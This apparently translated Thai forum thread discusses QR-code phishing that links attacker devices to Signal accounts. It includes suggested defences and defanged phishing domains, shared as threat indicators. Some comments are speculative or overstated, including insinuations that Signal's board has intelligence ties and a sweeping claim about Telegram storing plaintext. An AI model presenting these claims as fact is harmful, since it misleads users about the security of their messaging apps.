  • ถ้าหมายถึงแค่สแกน QR code ครั้งเดียวก็เชื่อมต่ออุปกรณ์ได้แล้ว ผมว่ามันน่าจะเป็นช่องโหว่หรือเปล่า
    ไม่ควรให้แค่สแกนโค้ดแล้วอุปกรณ์เชื่อมต่อได้ แต่ควรมี การยืนยันด้วยตนเอง เช่น “ใช่ ฉันจะเชื่อมต่อกับอุปกรณ์นี้” แบบนี้ถึงแม้ผู้ใช้จะสแกนเพราะคิดว่าเป็นโค้ดเชิญเข้ากลุ่ม ก็จะสังเกตได้ว่าจริง ๆ แล้วไม่ใช่ แน่นอนว่าสุดท้ายผู้ใช้ก็ยังต้องสังเกตเองอยู่ดี แต่นี่เป็นการปรับปรุงที่มีความหมายมากกว่า “นึกว่าเป็นโค้ดเข้าร่วมกลุ่มเลยสแกน แล้วจู่ ๆ ก็มีอุปกรณ์อื่นเชื่อมต่อแบบเงียบ ๆ”

    • ต้องจำไว้ว่า Signal ถูกออกแบบมาสำหรับผู้ใช้ที่ไม่ใช่สายเทคนิค
      ผู้ใช้จำนวนมากไม่เข้าใจและไม่ได้คิดลึกเรื่อง QR code, ลิงก์, การเชื่อมต่อ อะไรพวกนี้ พวกเขากดด้วยการเดาแบบทันทีและตามสัญชาตญาณ และบ่อยครั้งก็กดเพื่อให้มันหายไปจากหน้าจอแล้วกลับไปทำสิ่งที่ทำอยู่ ผมไม่รู้ว่ามีหลักฐานให้เชื่อได้ไหมว่าไม่มีขั้นตอนยืนยัน คงดูได้จากเอกสารของ Signal
  • บทความที่เกี่ยวข้อง: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
    เห็นผ่าน https://news.ycombinator.com/item?id=43103692 แต่ที่นั่นไม่มีคอมเมนต์

  • ข่าวดีคือ มีเหตุผลที่มันตกเป็นเป้าหมาย นั่นหมายความว่า Signal ยังมีประสิทธิภาพอยู่

  • มีเสียงจำนวนมากพยายามจะบอกว่า Signal ถูกเจาะแล้ว แต่แทบทุกกรณีควรมองด้วยว่าฝั่งนั้นมีความเป็น โอเพนซอร์ส ต่ำกว่า Signal
    Signal กำลังพยายามอย่างเต็มที่เพื่อปกป้องสิทธิมนุษยชน แม้จะกลายเป็นบริษัทระดับเว็บสเกลแล้วก็ตาม ศักดิ์ศรีของปัจเจกบุคคลเป็นเรื่องสำคัญ นี่ไม่ใช่แค่การสนทนาธรรมดา

    • สับสนว่า “ใคร” เป็นคนทำให้เสียหายกันแน่ รัสเซียหรือหน่วยข่าวกรองสหรัฐฯ ก็ไม่รู้
      ผมลองดูรายชื่อคณะกรรมการบนเว็บไซต์ Signal Foundation คร่าว ๆ แล้วเห็นคำอย่าง Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow, Foreign Affairs Policy Board ของ U.S. Department of State
      คนเหล่านี้ฟังดูเหมือนเป็นส่วนหนึ่งของโลกหน่วยข่าวกรอง ผมสงสัยว่าพวกเขาทำอะไรกันแน่ในคณะกรรมการของ Signal ซึ่งเป็นแอปส่งข้อความโอเพนซอร์ส ผมเห็นด้วยว่านี่ไม่ใช่แค่การสนทนาธรรมดา
    • Telegram แย่กว่าเป็นพิเศษ เพราะใช้ การเข้ารหัสของตัวเองและโปรโตคอลของตัวเอง โดยค่าเริ่มต้นไม่ได้ให้การเข้ารหัสแบบ end-to-end เลย และเก็บทุกอย่างไว้บนเซิร์ฟเวอร์เป็นข้อความธรรมดา
    • โดยรวมแล้วนี่เป็นสภาพแวดล้อมที่รับมือยากและมีข้อมูลเท็จจำนวนมาก โดยเฉพาะกับเป้าหมายที่มีคุณค่าอย่าง Signal
      ถ้า Signal ปลอดภัย ฝั่งที่โจมตีความเป็นส่วนตัวก็ย่อมอยากให้ผู้คนเชื่อว่า Signal ถูกเจาะแล้วและหันไปใช้อย่างอื่น ถ้าไม่ปลอดภัย กลับกันพวกเขาก็อยากให้ผู้คนเชื่อว่า Signal ปลอดภัย
      ผมคิดว่าทางออกคือเพิกเฉยต่อแหล่งข้อมูลเท็จที่เป็นไปได้ โดยเฉพาะผู้ใช้สุ่ม ๆ บนโซเชียลมีเดีย อย่างสิ้นเชิง รวมถึง HN ด้วย มันยากเมื่อศูนย์กลางทางสังคมอยู่ในที่แบบนั้น และเราต้องกันตัวเองออกมา ควรจำกัดไว้เฉพาะเสียงที่ถูกต้องตามกฎหมายและเชื่อถือได้
    • ไม่คิดว่ายังมีคนใช้คำว่า “เว็บสเกล” อย่างจริงจังอยู่
      “MongoDB เป็นเว็บสเกล แค่เปิดใช้ก็ขยายสเกลได้ทันที”
  • สามารถตรวจสอบได้ในเมนูตั้งค่าว่ามี อุปกรณ์ที่เชื่อมต่ออยู่ ที่ไม่คาดคิดหรือไม่

    • สงสัยว่า Signal ควรแสดงอุปกรณ์ที่เชื่อมต่ออยู่ในอินเทอร์เฟซผู้ใช้โดยตรงตลอดเวลาหรือเปล่า
      อาจเป็นไอคอนเล็ก ๆ อย่าง “อุปกรณ์ที่เชื่อมต่อใช้งานอยู่ 3 เครื่อง” ก็ได้
    • ไอเดียดี เดี๋ยวส่ง QR code ให้
  • มีการระบุบางโดเมนไว้ แต่ไม่ได้ถูกจดทะเบียนทั้งหมด
    ตัวอย่างเช่น signal-protect[.]host และ kropyva[.]site ยังว่างอยู่ ส่วน signal-confirm[.]site จดทะเบียนในยูเครน บางส่วนจดทะเบียนในรัสเซีย
    ประเทศที่อยู่ในภาวะสงคราม ไม่ว่าฝ่ายไหนก็ไม่ควรเชื่อ A โทษ B และ B โทษ A แต่ทั้งสองฝ่ายต่างก็มีวาระของตัวเอง

    • แม้ signal-confirm[.]site จะจดทะเบียนในยูเครน แต่ข้อมูล WHOIS มักเป็นข้อมูลปลอม จึงใช้เป็นหลักฐานได้ยาก
      เป็นที่รู้กันว่ารัสเซียใช้ข้อมูลรับรองหรือ SIM card ที่ถูกขโมยมาจากประเทศเพื่อนบ้าน รวมถึงยูเครน ในงานลักษณะนี้ด้วย
    • การที่โดเมนของผู้ไม่หวังดีจดทะเบียนในยูเครน ไม่ได้แปลโดยอัตโนมัติว่ากำลังทำเพื่อผลประโยชน์ของยูเครน หรือหน่วยงานยูเครนรับรู้อยู่
      น่าเสียดายที่ผู้ปฏิบัติการของรัฐรัสเซียก็ไม่มีปัญหาในการทำงานภายในยูเครนเช่นกัน พอบวกกับอาชญากรที่สับสนวุ่นวายซึ่งทำตามฝ่ายที่จ่ายเงินมากกว่า และคนที่เดินทางไปมาระหว่างพื้นที่ที่รัสเซียยึดครองชั่วคราวกับยูเครนทุกวัน เรื่องก็ซับซ้อนขึ้นอย่างรวดเร็ว
    • โดเมนที่ยังไม่ได้จดทะเบียนก็อาจเป็นตัวบ่งชี้การบุกรุกได้เช่นกัน หากพบจากตัวอย่างเช่น การวิเคราะห์ payload